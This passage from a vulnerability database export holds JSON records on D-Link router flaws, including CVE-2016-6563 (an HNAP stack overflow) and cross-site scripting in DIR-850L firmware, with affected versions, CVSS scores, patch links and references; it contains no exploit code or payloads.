in the LAN, it is\nrecommended to have a strong wireless password to prevent untrusted\nclients from connecting to the router. \n\n\n\u003e\u003e References:\n[1]\nhttps://isc.sans.edu//diary/More+on+HNAP+-+What+is+it,+How+to+Use+it,+How+to+Find+it/17648\n\n[2] https://en.wikipedia.org/wiki/Home_Network_Administration_Protocol\n[3] http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/\n[4] http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/\n[5] http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/\n[6]\nhttps://packetstormsecurity.com/files/134370/D-Link-DIR-818W-Buffer-Overflow-Command-Injection.html\n[7] https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf\n[8]\nhttp://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection\n[9] https://github.com/rapid7/metasploit-framework/pull/7543\n[10] https://www.kb.cert.org/vuls/id/677427\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-6563"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "PACKETSTORM",
"id": "139611"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-95383",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40805",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#677427",
"trust": 3.0
},
{
"db": "NVD",
"id": "CVE-2016-6563",
"trust": 3.0
},
{
"db": "BID",
"id": "94130",
"trust": 2.1
},
{
"db": "EXPLOIT-DB",
"id": "40805",
"trust": 1.8
},
{
"db": "JVN",
"id": "JVNVU99822187",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "139611",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "139836",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-95383",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-6563",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"id": "VAR-201807-0057",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
}
],
"trust": 0.69484702
},
"last_update_date": "2024-04-20T23:17:14.127000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Technical Support",
"trust": 0.8,
"url": "http://support.dlink.com/"
},
{
"title": "HNAP stack overflow :: DIR-8xx Routers Affected : All Models have Remote Admin Disabled as Default ",
"trust": 0.8,
"url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10066"
},
{
"title": "Multiple D-Link Repair measures for router buffer error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99597"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.kb.cert.org/vuls/id/677427"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/40805/"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/94130"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2016/nov/38"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-6563"
},
{
"trust": 0.9,
"url": "https://raw.githubusercontent.com/pedrib/poc/master/advisories/dlink-hnap-login.txt"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6563"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu99822187"
},
{
"trust": 0.3,
"url": "http://www.dlink.co.in/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49611"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework/pull/7543"
},
{
"trust": 0.1,
"url": "http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/"
},
{
"trust": 0.1,
"url": "https://en.wikipedia.org/wiki/home_network_administration_protocol"
},
{
"trust": 0.1,
"url": "https://isc.sans.edu//diary/more+on+hnap+-+what+is+it,+how+to+use+it,+how+to+find+it/17648"
},
{
"trust": 0.1,
"url": "http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/134370/d-link-dir-818w-buffer-overflow-command-injection.html"
},
{
"trust": 0.1,
"url": "http://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection"
},
{
"trust": 0.1,
"url": "http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/"
},
{
"trust": 0.1,
"url": "https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf"
},
{
"trust": 0.1,
"url": "http://www.agileinfosec.co.uk/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-95383"
},
{
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"db": "BID",
"id": "94130"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"db": "PACKETSTORM",
"id": "139611"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-13T00:00:00",
"db": "VULHUB",
"id": "VHN-95383"
},
{
"date": "2018-07-13T00:00:00",
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"date": "2016-11-07T00:00:00",
"db": "BID",
"id": "94130"
},
{
"date": "2016-11-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"date": "2016-11-08T16:44:46",
"db": "PACKETSTORM",
"id": "139611"
},
{
"date": "2016-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"date": "2018-07-13T20:29:01.003000",
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-95383"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULMON",
"id": "CVE-2016-6563"
},
{
"date": "2016-11-24T01:08:00",
"db": "BID",
"id": "94130"
},
{
"date": "2017-03-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005757"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201611-125"
},
{
"date": "2019-10-09T23:19:16.267000",
"db": "NVD",
"id": "CVE-2016-6563"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link Router made HNAP Service stack buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005757"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-125"
}
],
"trust": 0.6
}
}
VAR-201709-0586
Vulnerability from variot - Updated: 2023-12-18 14:05D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/sitesurvey.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \342\200\230action\342\200\231 parameter to the htdocs/web/wandetect.php file
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0586",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14415"
}
]
},
"cve": "CVE-2017-14415",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14415",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31794",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-105135",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-14415",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14415",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-31794",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-580",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-105135",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"db": "VULHUB",
"id": "VHN-105135"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/sitesurvey.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \\342\\200\\230action\\342\\200\\231 parameter to the htdocs/web/wandetect.php file",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"db": "VULHUB",
"id": "VHN-105135"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14415",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2017-31794",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201709-580",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105135",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"db": "VULHUB",
"id": "VHN-105135"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"id": "VAR-201709-0586",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"db": "VULHUB",
"id": "VHN-105135"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31794"
}
]
},
"last_update_date": "2023-12-18T14:05:39.873000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235005"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105135"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "NVD",
"id": "CVE-2017-14415"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14415"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14415"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"db": "VULHUB",
"id": "VHN-105135"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"db": "VULHUB",
"id": "VHN-105135"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105135"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"date": "2017-09-13T17:29:00.290000",
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31794"
},
{
"date": "2017-09-20T00:00:00",
"db": "VULHUB",
"id": "VHN-105135"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008096"
},
{
"date": "2023-11-08T20:23:29.577000",
"db": "NVD",
"id": "CVE-2017-14415"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Cross-site scripting vulnerability in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008096"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-580"
}
],
"trust": 0.6
}
}
VAR-201709-0584
Vulnerability from variot - Updated: 2023-12-18 14:01D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wpsacts.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \342\200\230action\342\200\231 parameter to the htdocs/web/wandetect.php file
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0584",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
